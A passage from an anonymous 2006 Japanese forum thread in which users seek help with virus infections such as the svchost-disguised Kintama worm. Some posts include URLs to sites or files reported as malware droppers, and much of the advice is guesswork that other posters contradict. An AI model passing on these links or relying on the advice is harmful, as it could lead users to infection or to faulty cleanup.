夏だから、いい演出だと思います。

829 :名無しさん@お腹いっぱい。:2006/07/30(日) 21:45:42
「仁義なきキンタマ」は、svchost.exeという名前で活動をします。
svchost.exeは、普通にWindowsを動かしていれば複数個動いていてもまったく問題ありません。

そのために、誤ってWindowsの作動に必要なsvchostを削除してしまうという人が後を絶ちません。
そこで、ウイルス本体と無害なsvchost.exeの見分け方を書いておきます。

まず、Ctrl+Alt+Delでタスクマネージャーを開いてください。
次にプロセスタブを開きます。
すると、svchost.exeというのが動いていると思います。
そのときに、そのsvchost.exeを動かしているのが誰なのかを見てください。
svchost.exeの右隣にある文字がそれです。
それが、「SYSTEM」、「NETWORK SERVIVE」、「LOCAL SERVICE」などなら問題はありません。
しかし、実行しているユーザー名が感染しているマシンのユーザー名(Ownerなど)の場合だと、
それは「仁義なきキンタマ」である可能性があります。
それだと思われるプロセスを見つけた場合は、そのプロセスをクリックして「プロセスの終了」をクリックしてください。
警告がでると思いますが、「はい」を押してください。そして、下記の駆除を行ってください。

これ、本当ですか?

830 :名無しさん@お腹いっぱい。:2006/07/30(日) 21:51:24
>>829
ウソ
サービス関係のsvchostは、C:\WINDOWS\SYSTEM32\svchost.exe
これ以外の場所にあるsvchost.exeが起動されている場合はウィルスだ

831 :名無しさん@お腹いっぱい。:2006/07/30(日) 21:53:26
PFファイルの場合はウイルスですか?
消した方がいいんですか?

832 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:00:40
>824のリンク先にあるアドレスって踏んだら感染、踏まなきゃ問題ない、と言うことですよね?

833 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:10:39
>>832
ウィルスによってにちゃんにデスクトップをアップされたバカたち

834 :829:2006/07/30(日) 22:18:25
ユーザーレベルで動いてるのはありませんでした。
結構いっぱい動いてたんですが、心配無いですよね??

835 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:19:06
ああ そうか
ie-spyadが登録している2ch.netのサブドメイン[tmp6][up.isp]は勝手にアップされるのを防ぐためだったのか
今はじめて気がついた

836 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:23:31
解答お願いします、、
あと、
boot.iniが検索で出てこなかったら大丈夫
svchostがユーザーで動いていない
exeファイルなんて踏んでいない

んですけど、大丈夫ですよね?
教えて教えてすいません、、お願いします

837 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:26:56
携帯もウィルスに感染したりするのでしょうか?

838 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:29:32
最近の形態はOS入ってるからな

839 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:32:26
>>837

840 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:33:18
>>837
javaとか入ってると危ないかも。アメリカではもう携帯に感染するウイルスが出たとか…。

841 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:35:30
>>836
これお願いします、、>>829の関連です、、

842 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:35:46
>>829
これどっかのテンプレで見たが、そっか嘘なのか、、

843 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:38:14
>>829で、起動している場所を調べるにはどうやったらいいんですか?

844 :837:2006/07/30(日) 22:42:22
>>838>>840
回答ありがとうございます。
注意したほうがいいみたいですね・・・

845 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:46:50
>>843
後々のために教えてやっからな
ProcessExplorer Ad-Aware Spybot - Search & Destroy
どれで起動中のプロセスを調べてもわかっからよ

846 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:48:28
svchostのユーザー名が、何で動いていたらウイルスなんですか?

847 :名無しさん@お腹いっぱい。:2006/07/30(日) 22:58:21
>>846
だから、新種のウィルスでサービスになんかに登録するものが出て来たらsystemなんかからの起動になるんだから余り意味ないんだからよ
自分のユーザー名でローカル起動されていたら大抵ウィルスだ

848 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:03:44
>>847
えっと、、じゃあ。、svchostがいっぱい起動してても、ユーザー名じゃなければ大丈夫ということですか??

849 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:09:09
>>848
だから、どこのsvchostが起動されているのか、全部調べろと言っているんだが?
日本語わからないのかな?

850 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:11:50
>>845でどうやって調べるのかわからないンですが、、

851 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:12:24
systemの振りしていない奴は即アウト

systemの振りしてるのが居るだってよ。

ホントにsystemの物か判断するには、svchos.exeが何処のパスから
起動されてるかが重要なんだってさ。

それにはプロセスの起動位置を知る。
それを調べるには>>845がヒント

で、いいんですよね?

852 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:13:02
>>848
初心者の俺だからよく知らないけどファイル検索してみて
おかしな場所にあったり、作成日時から判断してみては?いや適当だけど

853 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:13:57
svchost.exeがC:\WINDOWS\SYSTEM32\以外にもあるか
検索すればいいんじゃね?

854 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:16:39
svchost.exeがC:\WINDOWS\SYSTEM32\以外にあったんですけど、、
削除でおkですか?、、

855 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:17:13
プロセス落とさなきゃたぶん削除できないと。

856 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:18:50
>>854
念のためファイル名変えるだけにしといたら?

857 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:19:47
>>856
これはウイルスなんですか??
で、名前変えたらウイルスじゃなくなるんですか??教えてください、、、、、

858 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:20:54
>>854
どうせ、C:\WINDOWS\PrefetchとかC:\WINDOWS\SYSTEM32\dllcacheの中とか言い出すんだろう?
ネタはいいからよそでやれ

859 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:22:05
C:\WINDOWS\Prefetch
これの中です、、
大丈夫なんですか??
無知ですいません、、

860 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:26:50
>>859
大丈夫なんじゃない?

861 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:28:30
>>860
なんじゃない?って、、、
ネタじゃないんです、、、
マジレスお願いします

862 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:29:48
>>845の怪しそうな文字列でググレ。

英語読めんとかしらん。

863 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:31:09
>>861
いや俺もよくわからんから

864 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:31:28
>>861
大丈夫だと思うよタブン

865 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:32:37
シマンテックのオンラインウイルスチェックしたらウイルス96個出てきた。

でもウイルスバスター2006でウイルスチェックしてもウイルスは出ないんですよ。
何で?

866 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:34:27
>>865
更新してないんじゃあ?

867 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:35:57
>>866
してあるのですが・・

もっとも出てきたウイルスは全部2chの掲示板のデーターファイルみたいなのですが・・

868 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:36:21
おおかた2chログに誤爆してるだけだと予想

869 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:36:31
>>867
じゃあ心配ないよ

870 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:36:46
jpgでも感染するのね
オワタ

871 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:39:55
>>868
>>869
ホットしました。(TдT)

872 :名無しさん@お腹いっぱい。:2006/07/30(日) 23:47:09
携帯でVIPで出回っているlzhファイル踏んでしまったのですが、無害なのでしょうか?

873 :名無しさん@お腹いっぱい。:2006/07/31(月) 01:30:39
キンタマのウイルスってオンラインスキャンで見つけられますか?
今オンラインスキャンしたらウイルスの数は0個だったんですが心配です。

874 :名無しさん@お腹いっぱい。:2006/07/31(月) 02:17:50
すいません、今見てみたのですが>>853以外の場所にあったりしたらヤバいのでしょうか?
自分の場合Winサービスパックの中等にも検出されたりするのですが。
作成日時等から判断して大丈夫っぽいですが気になります。

875 :名無しさん@お腹いっぱい。:2006/07/31(月) 02:53:57
【使用OS】 win XP
【WindowsUpdateしてるか】 しています。
【AntiVirusは何を使っているか】 ウィルスセキュリティ
【ちゃんとUpdateしてるか】 しています。
【スキャンした結果(ウイルス名・発見場所)】 ローカルディスク(C)
【別のオンラインスキャンしたならその結果は】 
ウィルスセキュリティでは発見できませんでしたが、
トレンドマイクロのオンラインスキャンでは発見されました。
【症状を具体的に、分かる限りすべて書く】症状は特にありません。
【何をしたらそんなことになったのか】 2chの書き込みを安易に踏んでダウンロードしてしまった。
【これまでにとった措置】 トレンドマイクロのホームページに書かれているように手動で削除しました。
【その他の質問】
シャレタマに感染し、対応しました。
ウィニー、シャレなどの共有ソフトは使用してないのですが、
PC内の情報が洩れることはありますか?

どなたか、よろしくお願いします。

876 :名無しさん@お腹いっぱい。:2006/07/31(月) 09:11:57
このファイルふんじゃったよ。
(WinMXで手に入れた)

ttp://painapuru11.hp.infoseek.co.jp/111.ZIP
DLした圧縮ファイルをさらに圧縮してあります。

InternetSecurity2005では無反応なんだけどまずいかなぁ。
でもInternetSecurity2006のアクティベーションができなくなったよ。
(アクティベーション時だけキーボードの一部がダメ。文字のコピペもだめ)

877 :名無しさん@お腹いっぱい。:2006/07/31(月) 09:14:23
svchost って、なんなんだ?inted みたいなもの?

878 :名無しさん@お腹いっぱい。:2006/07/31(月) 09:22:05
実行ファイルでないファイルからウイルスに感染することってあるんですか?

もちろん、.jpg     .exe とかは論外ですが、正真正銘の JPEG 形式のファイルから、
たとえそれ自体がウイルスではないにしても、なんとかオーバフローとかで、ほかの
ウイルスプログラムを実行したりできるんですか?

圧縮ファイルは、解凍した瞬間に感染するものがあると聞きました。

879 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:17:56
今オンラインウイルススキャンしたら、HTML_CRINET.Aっていうウイルスが出てきたんですが、これは何ですか?
マジレス希望

880 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:24:24
>>876
それ、グロjpgの拡張子をexeに変えただけじゃないのか。

881 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:26:14
>>876
exeかと思ったらただのちんこ画像だった

>>878
http://www.google.co.jp/search?hl=ja&q=jpeg+%E8%84%86%E5%BC%B1%E6%80%A7&lr=lang_ja
http://www.google.co.jp/search?hl=ja&q=lhaz+%E8%84%86%E5%BC%B1%E6%80%A7&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

>>879
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_CRINET.A
実害は無い。ほっといてよろし

882 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:30:05
>>879
ひまなんでわかりやすく例えてみる。

2chに「野球ってなんですか?」って質問があったらどう思いますか?

あんたの質問は「野球」ってなんですか?
って言っているのと同じ。

あんたは野球を調べるのにどうしますか?
「自分でしらべろよ」っておもいません?
YahooなどExciteなどGoogleなどで調べたりしませんか?

一発で答えが出てきますよ。



あ、夏休みか・・・・。

883 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:30:08
>>881
そうですか。ありがとうございました

884 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:35:17
>>880-881
涙が出るほどありがとう。
そして、オレはずかしい。

人生やり直してくる。


885 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:47:36
新手のウィルスが出回ってるみたいですね。



886 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:48:52
>>885
苺キンタマみたいなやつね

887 :名無しさん@お腹いっぱい。:2006/07/31(月) 10:53:35
>>879
これは、Visual Basicで記述された、悪意のあるHTMLスクリプトです。

実行されると、黒い通信ウィンドウを大量に開き、マイクロソフトのWebサイトに接続します。
これによりパソコンの能力を大きく消費し、動作が極端に重くなる場合があります。

ファイルの改変や削除、情報漏洩はありません。

888 :名無しさん@お腹いっぱい。:2006/07/31(月) 11:22:46
ちなみにXPなら
「ファイル名を指定して実行」で「cmd」と打ち
コマンドプロンプト画面で「tasklist /SVC」コマンドを実行する

でもどうせ夏厨には意味不明だろうけどwww


これやったらどうなるんですか?

889 :名無しさん@お腹いっぱい。:2006/07/31(月) 11:26:50
TASKLIST

オプション:
  [/S システム [/U ユーザー名 [/P [パスワード]]]]
  [/M [モジュール] | /SVC | /V] [/FI フィルタ] [/FO 形式] [/NH]

説明:
このコマンド ライン ツールによってローカルまたはリモートのシステム
で実行されているアプリケーションと関連付けられたタスクまたはプロセスの
一覧が表示されます。

パラメータ一覧:
  /SVC それぞれのプロセスのサービスを表示します。

890 :名無しさん@お腹いっぱい。:2006/07/31(月) 11:32:07
じゃあ、>>888をやっても大丈夫なんですね?

891 :名無しさん@お腹いっぱい。:2006/07/31(月) 11:48:42
大丈夫だお。

892 :名無しさん@お腹いっぱい。:2006/07/31(月) 11:52:44
「涼宮ハルヒ」の画像を表示するトロイの木馬、トレンドマイクロが警告
ttp://internet.watch.impress.co.jp/cda/news/2006/07/24/12763.html

893 :名無しさん@お腹いっぱい。:2006/07/31(月) 11:58:17
いつの話だよ。

894 :名無しさん@お腹いっぱい。:2006/07/31(月) 12:02:36
いつの話だよ。

895 :名無しさん@お腹いっぱい。:2006/07/31(月) 13:38:06
略して〜?
いつバナぁ!

896 :名無しさん@お腹いっぱい。:2006/07/31(月) 14:19:55
昨日くらいから新種の苺キンタマが騒がれてるけどさ
感染ルートとして、jpgファイルをブラウザやビューアで開いただけで感染したって報告をやたら見るけど、実際どうなんだろうな?
確かにjpgにコードを埋め込む事は可能だけど
それを実行するには事前にPCにコードを解凍して実行するプログラムを仕込んでおくか
Windowsの画像表示の脆弱性を利用するかでしょ
ただWindowsの脆弱性に関してはパッチを当ててなかったり
GDI+の脆弱性はプログラムごとに専用のパッチを当てなきゃいけないから、IEやWindows標準のビューアは対策済みでも
独自のビューアとか専ブラのビューア機能経由で感染ってのは可能性あるかもね
昨日くらいから色んなロダに、画像サイズの割に容量が大きすぎるjpgファイルが貼られてるしね

897 :名無しさん@お腹いっぱい。:2006/07/31(月) 14:47:43
元々.bmpの拡張子を.jpgに書き換えただけって解釈してた

898 :名無しさん@お腹いっぱい。:2006/07/31(月) 14:49:50
チラシの裏

899 :名無しさん@お腹いっぱい。:2006/07/31(月) 15:38:48
>>896
インターネットゾーンのセキュリティ項目にある「拡張子ではなく、内容によってファイルを開くこと」を利用している。
実際にこれが有効になっているとIEは、ウェブ上のファイルの拡張子を無視する。
だから、危険なスクリプトなどを実行してしまうって訳だ。
嫌ならこれを無効に設定しておく事。

900 :名無しさん@お腹いっぱい。:2006/07/31(月) 15:54:42
jpgで感染されたら対処すんのムリポ

901 :名無しさん@お腹いっぱい。:2006/07/31(月) 17:08:15
昔初級ネット板で板ロゴ作ろうって話になったとき
画像に何か埋め込まれているのはダメって言われたな

902 :名無しさん@お腹いっぱい。:2006/07/31(月) 17:51:24
すいません、昨日ウィルス(トロイの木馬)が発見されまして、
ファイルを削除して今の所、ウィルスバスターオンラインで検出はなくなったのですが、
現在何処から感染したのかと、色々調べておりまして、

tp://www.lingamesjp.com/bbs/index.htm

↑のwebサイトを開くとウィルスが感染するかどうか、開かずに分かる方法はありますか?
上記のサイトを見て感染というのが一番確立が高そうなのですが・・・。

宜しくお願い致します。

決して、初心者の方は、クリックしないで下さいね。

903 :名無しさん@お腹いっぱい。:2006/07/31(月) 18:07:49
>>902
ttp://www.lingamesjp.com/bbs/realx.smi
これがウィルスらしい Downloader-ATPだってよ

904 :名無しさん@お腹いっぱい。:2006/07/31(月) 18:10:59
>>903
早速お返事ありがとうございます、
そうです、そのDownloader-ATPでしたorz

このウィルスに関しての情報を調べていた所、どのような動作をするのか
よく分からなかった(トロイの木馬だったので、ファイルの流出etc?)のですが、
実際にどのような動作をするものなのか(トロイの木馬にしても、ファイル流出、HDD破壊
など色々あるようなので)お解かりでしたら教えて頂けないでしょうか。

度々申し訳無いのですが、宜しくお願い致します。

905 :名無しさん@お腹いっぱい。:2006/07/31(月) 18:30:14
>>904
情報がネット上にほとんどないので俺の推測だが、
RealPlayerの古いバージョンでセキュリティホールがあるものだと、
それを利用されて何かを強制インストールされるものと思われる
それがトロイの木馬だ

906 :名無しさん@お腹いっぱい。:2006/07/31(月) 19:30:47
>>905
丁寧にありがとうございますm(_ _)m
なるほど、RealPlayerですか、念のために最新Verのチェックをしてきます。
ありがとうございました。

907 :名無しさん@お腹いっぱい。:2006/07/31(月) 20:59:04
なんか、突然recyclerというゴミ箱みたいなのが現れたのですが一体なんなのでしょうか。
ローカルディスクだけにそういうことが起こってます。
他のところは異常なし
Win2000

908 :名無しさん@お腹いっぱい。:2006/07/31(月) 21:24:24
ttp://www003.upp.so-net.ne.jp/shigeri/technique/technique5.html

[保護されているオペレーティング システム ファイル(システム ファイルおよび隠しファイル)を Windows エクスプローラで表示するように選択しました。]という警告ウィンドウが出ますが「はい」を押します。
「OK」を押しウィンドウを閉じます。

909 :名無しさん@お腹いっぱい。:2006/07/31(月) 22:06:26
すいません、ウイルス系はここでお聞きすればよろしいのでしょうか?

rdr.srsというトロイの木馬に感染したみたいなのですが・・・・レジストリを削除してくれという指示なのですが、レジストリにありません。
上記のファイルを削除しようとしても『ほかの人かシステムが使用中です』って言われて削除出来ません。
どうしたらよいですか?

910 :名無しさん@お腹いっぱい。:2006/07/31(月) 22:09:38
検索もできないの?
ネットするの止めれば?

911 :名無しさん@お腹いっぱい。:2006/07/31(月) 22:21:58
>>909
ここで質問するのはかまわんが
どこのスレだろうとテンプレくらいには目を通すもんだ

>>1を音読してから出直しておいで

912 :名無しさん@お腹いっぱい。:2006/07/31(月) 22:48:21
programフォルダにこれがいつのまにかあったんですけど
削除すれば大丈夫ですか?

http://www.dotup.org/uploda/www.dotup.org5389.exe.html





913 :名無しさん@お腹いっぱい。:2006/07/31(月) 23:37:23
>>912
拡張子.bmpのファイル
ただのこけ脅し

914 :名無しさん@お腹いっぱい。:2006/07/31(月) 23:37:23
>>912
ただの画像
いつの間にか有ったという件に関しては知らん
自分のPCの事くらい自分で把握しろ

915 :名無しさん@お腹いっぱい。:2006/07/31(月) 23:43:41
>>912
アプロダ漁り辞めれば?

916 :名無しさん@お腹いっぱい。:2006/08/01(火) 00:34:25
ウイルスによるものかどうかわからないのですが…昨日あたりから突然、
ブラウザを起動して何らかのサイトを開こうとするか、
あるいはアンチウイルスソフトでウイルススキャンを始めた直後に、
ブラウザやスキャンしているウインドウが酷い文字化けのような状態になってしまい、
さらにデスクトップ上のアイコンの名前が違うフォントのものに変わり、
他のアプリケーションのウインドウも
文字がほとんど消えてレイアウトもぐちゃぐちゃになったり…と
とにかく画面がむちゃくちゃになってしまうようになりました。
再起動したらひとまず直りますし、
他のアプリケーション自体は問題なく動くのですが、
ブラウザとウイルススキャンを始めた時だけそうなります。

ネット検索もウイルススキャンもできないため、
こちらで質問させていただいました。
何かわかる方はいらっしゃらないでしょうか。

917 :名無しさん@お腹いっぱい。:2006/08/01(火) 01:48:12
トロイの木馬に感染してしまいました(;_;)
再セットアップすれば安全なのでしょうか?教えてください(>_<)

918 :名無しさん@お腹いっぱい。:2006/08/01(火) 02:14:48
>>917
アプロダ漁り辞めたら?

919 :名無しさん@お腹いっぱい。:2006/08/01(火) 02:25:12
>>916
まずテンプレ使え・・・

>>917
初心者版にで行け

920 :名無しさん@お腹いっぱい。:2006/08/01(火) 04:30:10
【使用OS】
Windows XP
【WindowsUpdateしてるか】
してます
【AntiVirusは何を使っているか】
ウィルスバスター2005
【ちゃんとUpdateしてるか】
してます
【スキャンした結果(ウイルス名・発見場所)】
ウィルス名 TROJ_HORST.DT
発見場所  C:\DOCUME~1\ユーザー名\LOCALS~1\Temp\46ex2.mhdd.exe
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
tempファイルを全削除しても復活してくる;;
ウィルスバスターが46ex2.mhdd.exeが外部へアクセスしようとしていますと警告してくる
【何をしたらそんなことになったのか】
2ch・メッセ
【これまでにとった措置】
tempファイルの全削除
【その他の質問】
MSNメッセンジャーを消したら一応警告とトロイの増殖は止まりました
でも再度メッセつけたらまた復活しそうで怖いです;;
トロイの木馬だと思うんですがどういった対応したらいいですか?

921 :名無しさん@お腹いっぱい。:2006/08/01(火) 07:29:14
TROJ_AGENT.DFNsakura_tanpopo.exe

バスタ2006 最新パタンで検出

922 :916:2006/08/01(火) 08:07:03
>>919
申し訳ありません。

【使用OS】WindowsXP
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】Norton Anti Virus 2006
【ちゃんとUpdateしてるか】
していましたが、初めて症状が出た時にチェックしたら自動LiveUpdate機能だけがoffになっており、
ウイルス定義は2日前のものになっていました。自分でoffにした記憶はありません(というかしたことありません)
【スキャンした結果(ウイルス名・発見場所)】
>>916で書いた通り、スキャンを開始した途端に症状が出ます。
最終的には仮想メモリ不足のような状態になりウインドウ自体が表示できなくなるため
ちゃんと動作しているのか、完了したのか、結果はどうなったかもわかりません。
【別のオンラインスキャンしたならその結果は】
上記と同様にブラウザでサイトを開いた途端に症状が出るためオンラインスキャンも使用できません。
【症状を具体的に、分かる限りすべて書く】
>>916の通りです。セーフモード中でも同様です。
またシステムの復元を試そうとすると同様の症状が出ることもわかりました。
なおこの書き込みはJane Doe Styleで行っています。2ちゃんブラウザなら使用しても大丈夫のようです。
IEやSlepnirだとすぐさま症状が出て使えません。
【何をしたらそんなことになったのか】
昨日の朝、Slepnirを使って、ブックマークにあるサイト(どこかは忘れてしまいました…)
を開こうとしたら突然症状が出始めました。その前日まではどのサイトを開いても問題はありませんでした。
【これまでにとった措置】
最初はフォントが壊れているのかと思い、
FNTキャッシュの削除、セーフモードでの立ち上げ、インターネット一時ファイルの削除など。
ウイルススキャンやシステム復元は症状が出るため完了できません。

よろしくお願いいたします。

923 :名無しさん@お腹いっぱい。:2006/08/01(火) 08:18:32
>>922
Nortonやられてる可能性あり。
フリーのAvira AntiVirインストール。

924 :923:2006/08/01(火) 08:28:44
一応リンク張っておきます。
AntiVir
http://www.free-av.com/

先に↓を試してみたほうがいいかも。
トレンドマイクロ システムクリーナー
http://www.trendmicro.co.jp/download/tsc.asp


925 :名前:2006/08/01(火) 11:06:21


926 :名無しさん@お腹いっぱい。:2006/08/01(火) 11:58:56
お願いします。
【使用OS】Wimdnws XPpro.
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ウイルスバスター2006
【ちゃんとUpdateしてるか】している
【スキャンした結果(ウイルス名・発見場所)】TROJ ROOTKIT.E(rdriv.sys)
Windows\system32
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】強制シャットダウンを走らせる
【何をしたらそんなことになったのか】ネット閲覧
【これまでにとった措置】システムクリーナーやトレンドマイクロの指示通りにした。
【その他の質問】上記の指示でレジストリを消すと言われたのですが、消せませんでした。

927 :名無しさん@お腹いっぱい。:2006/08/01(火) 12:27:20
Trojan.Haradongに感染してノートンで自動的に削除されたようなのですが
セキュリティソフトの実行ファイルを削除するウイルスらしいので
再インストールしたほうがいいのでしょうか?
それとも自動的に削除された場合は大丈夫なのでしょうか?

928 :名無しさん@お腹いっぱい。:2006/08/01(火) 12:55:57
>>927
まあ、常駐シールドが有効になっていれば実行されずに削除されるのが普通だからそんな事にはならないと思う。
「削除出来ません」になった場合には、大抵実行されてしまってインストールされているから対処が必要
しかし、WindowsUpdateをきっかりとやっていて、発見場所がTemporary Internet Filesの場合には、
セキュリティホールなどを利用されてのインストールは
まず実行されていないから無視してもほとんどは安全

929 :名無しさん@お腹いっぱい。:2006/08/01(火) 13:03:16
>>928
一回ノートンで削除できませんと表示されて
しばらく後に自動的に削除されましたと表示されたのですが
あと、このウイルスの実行された場合に出る症状が見られない(C:\にテキストファイル作成など)
のですがこの場合はどうなのでしょうか?
アップデートはノートン・WindowsUpdate共にしっかりやってます

930 :名無しさん@お腹いっぱい。:2006/08/01(火) 13:20:11
>>929
ぐだぐだ書いてる暇に再インストール出来るんじゃないのか?

931 :名無しさん@お腹いっぱい。:2006/08/01(火) 13:56:33
zip形式などの圧縮ソフトを解凍するとウイルスに感染するケースがあると聞きましたが
解凍する前にウイルスかどうかを判断するには何をすればよいのでしょうか?
調べる方法、もしくはソフトがあればお願いします。

932 :名無しさん@お腹いっぱい。:2006/08/01(火) 14:12:45
RARで中をのぞいて、あやしい実行ファイルやスクリーンセーバーは消去するw
でも大量のフォルダがある場合は大変な労働力になるのでお勧めできない。

933 :名無しさん@お腹いっぱい。:2006/08/01(火) 14:14:29
怪しげな物は拾わなければ解決w

934 :名無しさん@お腹いっぱい。:2006/08/01(火) 15:16:08
どなた様か>>926を・・・。

935 :名無しさん@お腹いっぱい。:2006/08/01(火) 15:49:29
処理の結果: ウイルス感染ファイルを隔離できませんでした。
このウイルスは、手動で処理する必要があります。
.
ファイル名: C:\WINDOWS\STUP_TMP.#32
ウイルス/スパイウェア名: TROJ_SDSCAN.A (クリックで詳細情報を表示)

と出るんですがSTUP_TMP.#32 をさがしても見つかりません。
どうすればよろしいのでしょうか?

936 :931:2006/08/01(火) 16:24:29
う〜ん、、結局はそういう方法でしかないということなのかな・・
>>932すみませんRARの詳細を教えてください
一応検索してみたのですが・・

937 :名無しさん@お腹いっぱい。:2006/08/01(火) 18:29:49
>>926
たかだか3時間やそこらでせかさないように

レジストリキーが消せないってのは?
・キーが存在しない
・削除しようとするとエラーが出る
・削除できるけど復活する

存在しないなら無視して話を進めればいいけど、
そうでなければかなり状態は悪そう
OS再インストールが一番の近道かねえ

938 :名無しさん@お腹いっぱい。:2006/08/01(火) 19:33:55
下のスレの498のリンクをひらいたら、ウイルスに感染された恐れがある、とでたのですが…
ttp://game10.2ch.net/test/read.cgi/ff/1150962646/

どなたか私にどうしたらいいか教えて下さい。救助依頼します。

以下コピペです。

498 :名前が無い@ただの名無しのようだ :2006/07/21(金) 02:02:44 ID:bPzGXI8E0
ttp://img198.imageshack.us/my.php?image=vj0609054ak9.jpg
ttp://img111.imageshack.us/my.php?image=vj0609188ei2.jpg



939 :名無しさん@お腹いっぱい。:2006/08/01(火) 19:43:36
RAR 
読み方 : ラー

 汎用の可逆ファイル圧縮形式の一つ。Eugene Roshal氏が開発した「RAR」「WinRAR」などの
 アプリケーションで使われていた形式で、現在では様々なソフトウェアでサポートされている。
 LZH形式やZip形式より圧縮率が高く、圧縮ファイルを任意のサイズの複数のファイルに分割
 したり、分割されたファイルを統合して解凍したりできることから、ネット上の大容量ファイル交換
 に広く使われるようになった。圧縮ファイルに電子署名を付加する機能もある。

 

940 :名無しさん@お腹いっぱい。:2006/08/01(火) 19:57:19
様々なソフトウェアでなんてサポートされていねえよ
解凍しなきゃ使えねえんだからよ

941 :名無しさん@お腹いっぱい。:2006/08/01(火) 23:51:44
>>938
わざわざスレ立てまでするマルチは再インスコでいいよ

942 :名無しさん@お腹いっぱい。:2006/08/01(火) 23:55:46
人生破壊型ウイルスが全盛の昨今、
リカバリくらい可愛いもんだよな。

統合インストールの勉強でもしたら?ww

943 :名無しさん@お腹いっぱい。:2006/08/02(水) 00:03:43
さきほど、動画2chの「mpio-one 独自形式.mp4ファイル」というスレで
「動画」というところをクリックしたところ、「しばらく待ってください」
とでてしばらくしてもなにも出てこなかったのですが、
これはウィルスなのでしょうか?

 初心者ですのでレスをおねがいしたします。

944 :名無しさん@お腹いっぱい。:2006/08/02(水) 00:08:44
それだけでは何とも言えません…。

945 :名無しさん@お腹いっぱい。:2006/08/02(水) 20:05:40
>>923-924
ありがとうございます。
システムクリーナーを試したあとにAntiVirをインストールしてスキャン、
その結果ウイルスは検出されず、またNortonもアンインストールしましたが、
ブラウザで何らかのサイトを開こうとするとやはり同じ症状が出てしまいます。
これはNorton以外にも問題が発生しているということなのでしょうか…

946 :名無しさん@お腹いっぱい。:2006/08/02(水) 22:41:36
クリーンイントトールをお勧めする

947 :名無しさん@お腹いっぱい。:2006/08/02(水) 22:51:22
>>945
ネットから切り離してもなるかい?
まじめな話、クリーンインストールを奨めるが。

948 :名無しさん@お腹いっぱい。:2006/08/03(木) 04:14:23
http://www.geocities.jp/kameda_3kyoudai_shinjitu/index.html
これなんてウィルス?

949 :名無しさん@お腹いっぱい。:2006/08/03(木) 04:57:13
>>948
VIPかニュー即へ帰れ
初心者板へ行け

950 :名無しさん@お腹いっぱい。:2006/08/03(木) 08:01:47
PHP_SHELL.G(ウィルスタイプ・Script Trojan)というウィルスにかかった。
どうやって駆除すればいい?

951 :名無しさん@お腹いっぱい。:2006/08/03(木) 08:12:49
【使用OS】Windows XP
【WindowsUpdateしてるか】 していない
【AntiVirusは何を使っているか】 ウィルスバスター.Corp
【ちゃんとUpdateしてるか】 していない
【スキャンした結果(ウイルス名・発見場所) PHP_SHELL.G
C:\Documents and Settings\ユーザー名\Application Data\Mozilla\Profiles\default\eaxygqyy.slt\Cache
【別のオンラインスキャンしたならその結果は】 スキャンができない。
【症状を具体的に、分かる限りすべて書く】今のところ何も起きていないが、ウィルスにかかっていると情報があった。
【何をしたらそんなことになったのか】 Windows起動後に発見
【これまでにとった措置】 まだ何もしていない。

952 :名無しさん@お腹いっぱい。:2006/08/03(木) 08:13:59
発見場所修正
C:\Documents and Settings\ユーザー名\Application Data\Mozilla\Profiles\default\eaxygqyy.slt\Cache\EF7538B8d01

953 :名無しさん@お腹いっぱい。:2006/08/03(木) 08:17:21
>>951
再インストールしてちゃんとUpdateしろ

そんなことより>>948の解明はどうなった?新種?

954 :名無しさん@お腹いっぱい。:2006/08/03(木) 08:24:19
何が新種だよ?w

955 :名無しさん@お腹いっぱい。:2006/08/03(木) 08:26:33
>>954
さっさと再インストしてたら?

956 :名無しさん@お腹いっぱい。:2006/08/03(木) 08:40:45
何が?

957 :名無しさん@お腹いっぱい。:2006/08/03(木) 09:09:20
>>953
正確に言えば、大学から購入したあらかじめ設定済みのパソコンだから、
アップデートしているかどうかは詳しくわからない。

